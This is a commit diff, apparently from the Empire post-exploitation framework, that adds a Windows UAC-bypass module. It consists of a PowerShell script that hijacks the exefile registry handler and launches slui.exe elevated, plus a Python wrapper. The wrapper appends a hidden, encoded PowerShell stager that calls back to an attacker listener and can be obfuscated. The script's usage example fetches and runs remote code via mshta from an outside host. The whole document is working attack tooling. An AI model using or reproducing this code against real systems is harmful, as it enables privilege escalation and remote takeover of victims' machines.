EmpireProject · ThePirateWhoSmellsOfSunflowers · Oct 8, 2018 · Oct 8, 2018 · Oct 8, 2018
diff --git a/data/module_source/privesc/Invoke-SluiBypass.ps1 b/data/module_source/privesc/Invoke-SluiBypass.ps1
@@ -0,0 +1,64 @@
+<#
+.SYNOPSIS
+    This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
+.NOTES
+    Function   : SluiHijackBypass
+    File Name  : SluiHijackBypass.ps1
+    Author     : Gushmazuko
+.LINK
+    https://github.com/gushmazuko/tools/blob/master/SluiHijackBypass.ps1
+    Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
+.EXAMPLE
+    Load "cmd.exe" (By Default used 'arch 64'):
+    Invoke-SluiBypass -command "cmd.exe" 
+
+    Load "mshta http://192.168.0.30:4444/0HUGN"
+    Invoke-SluiBypass -command "mshta http://192.168.0.30:4444/0HUGN"
+#>
+
+function Invoke-SluiBypass(){
+    Param (
+
+        [Parameter(Mandatory=$True)]
+        [String]$command
+    )
+
+    $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
+    $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
+
+    if(($(whoami /groups) -like "*S-1-5-32-544*").length -eq 0) {
+        "[!] Current user not a local administrator!"
+            Throw ("Current user not a local administrator!")
+    }
+    if (($(whoami /groups) -like "*S-1-16-8192*").length -eq 0) {
+        "[!] Not in a medium integrity process!"
+        Throw ("Not in a medium integrity process!")
+    }
+
+    else{
+
+        #Create registry structure
+        New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
+        New-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "DelegateExecute" -Value "" -Force
+        Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force
+
+        # Check for the environment and execute the Bypass
+
+        if ( [environment]::Is64BitOperatingSystem -eq "True" ) 
+        {
+            # x64 shell in Windows x64 | x86 shell in Windows x86
+            Start-Process "C:\Windows\System32\slui.exe" -Verb runas
+        }
+        else
+        {
+            # x86 shell in Windows x64
+            C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
+        }
+
+        #Remove registry structure
+        Start-Sleep 3
+        Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
+
+    }
+}
+
diff --git a/lib/modules/powershell/privesc/bypassuac_slui.py b/lib/modules/powershell/privesc/bypassuac_slui.py
@@ -0,0 +1,115 @@
+from lib.common import helpers
+
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        self.info = {
+            'Name': 'Invoke-SluiBypass',
+
+            'Author': ['@bytecode77','@Gushmazuko', '@truneski', '@ThePirateWhoSmellsOfSunflowers (github)'],
+
+            'Description': ("This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under the Current User hive, and inserting a custom command that will get invoked when any binary (.exe) application is launched."),
+
+            'Background' : True,
+
+            'OutputExtension' : None,
+
+            'NeedsAdmin' : False,
+
+            'OpsecSafe' : False,
+
+            'Language' : 'powershell',
+
+            'MinLanguageVersion' : '2',
+
+            'Comments': [
+                 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation',
+                 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1'
+            ]
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                'Description'   :   'Agent to run module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'UserAgent' : {
+                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            },
+            'Proxy' : {
+                'Description'   :   'Proxy to use for request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            },
+            'ProxyCreds' : {
+                'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            } 
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        for param in params:
+            # parameter format is [Name, Value]
+            option, value = param
+            if option in self.options:
+                self.options[option]['Value'] = value
+
+
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+
+        listenerName = self.options['Listener']['Value']
+
+        # staging options
+        userAgent = self.options['UserAgent']['Value']
+        proxy = self.options['Proxy']['Value']
+        proxyCreds = self.options['ProxyCreds']['Value']
+
+        # read in the common module source code
+        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-SluiBypass.ps1"
+        if obfuscate:
+            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
+            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
+        try:
+            f = open(moduleSource, 'r')
+        except:
+            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
+            return ""
+
+        moduleCode = f.read()
+        f.close()
+
+        script = moduleCode
+
+        if not self.mainMenu.listeners.is_listener_valid(listenerName):
+            # not a valid listener, return nothing for the script
+            print helpers.color("[!] Invalid listener: " + listenerName)
+            return ""
+        else:
+            # generate the PowerShell one-liner with all of the proper options set
+            launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
+            encScript = launcher.split(" ")[-1]
+            if launcher == "":
+                print helpers.color("[!] Error in launcher generation.")
+                return ""
+            else:
+                scriptEnd = "Invoke-SluiBypass -command \"powershell -NoP -NonI -w Hidden -enc %s\"" % (encScript)
+                if obfuscate:
+                    scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+                script += scriptEnd
+                return script